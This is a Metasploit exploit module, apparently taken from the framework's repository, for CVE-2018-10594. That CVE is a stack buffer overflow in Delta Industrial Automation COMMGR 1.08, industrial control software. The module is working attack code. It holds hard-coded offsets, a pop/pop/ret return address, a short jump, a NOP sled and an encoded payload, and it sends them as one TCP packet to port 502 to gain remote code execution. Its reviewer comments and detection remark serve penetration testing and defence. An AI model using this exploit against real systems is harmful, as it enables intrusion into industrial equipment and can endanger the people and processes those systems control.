Path: blob/master/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2018-10594 (see 'References'): a stack-based buffer
# overflow in COMMGR.exe (Delta Industrial Automation COMMGR 1.08) reached by a
# single crafted TCP packet. The only option registered is RPORT (default 502).
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability rank for this module.
  Rank = NormalRanking

  # Provides connect / sock / disconnect used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, the single
  # target and its buffer layout constants) and the RPORT option.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
        crafted packets. This module has been tested successfully on Delta Electronics Delta
        Industrial Automation COMMGR 1.08 over
        Windows XP SP3,
        Windows 7 SP1, and
        Windows 8.1.
      },
      'Author'         =>
        [
          'ZDI', # Initial discovery
          't4rkd3vilz', # PoC
          'hubertwslin' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2018-10594' ],
          [ 'BID', '104529' ],
          [ 'ZDI', '18-586' ],
          [ 'ZDI', '18-588' ],
          [ 'EDB', '44965' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
        ],
      'Payload'        =>
        {
          'Space'    => 640, # upper bound on payload.encoded length appended in #exploit
          'DisableNops' => true, # no framework NOP padding; #exploit adds its own make_nops(40) sled
          'BadChars' => "\x00" # NUL must not occur in the encoded payload
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Single target; the address and offset below are hard-coded for
          # COMMGR.exe 1.08 and are the only per-target values #exploit reads.
          [ 'COMMGR 1.08 / Windows Universal',
            {
              'Ret'    => 0x00401e14, # p/p/r COMMGR.exe
              'Offset' => 4164 # bytes of random filler before the overwritten control data
            }
          ],
        ],
      'DisclosureDate' => '2018-07-02',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(502)
      ])
  end

  # Builds the overflow buffer and writes it to RPORT in one put, then
  # disconnects without reading a response.
  #
  # Buffer layout, in order:
  #   target['Offset'] bytes of random alpha filler
  #   4 bytes: short jump (the existing comment says it lands in the NOP sled)
  #   4 bytes: target.ret as a 32-bit little-endian value ("V")
  #   40 bytes: NOP sled
  #   payload.encoded
  #
  # NOTE(review): a short jump immediately followed by a p/p/r address (see the
  # 'Ret' comment) is the shape of an SEH overwrite — confirm against the advisory.
  # On the wire this is a single write of Offset + 48 + payload bytes
  # (well over 4 KB) to the COMMGR port, which is the observable for detection.
  def exploit
    data = rand_text_alpha(target['Offset'])
    data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
    data << [target.ret].pack("V")
    data << make_nops(40)
    data << payload.encoded

    # Length reported here is the full buffer including the encoded payload.
    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end
end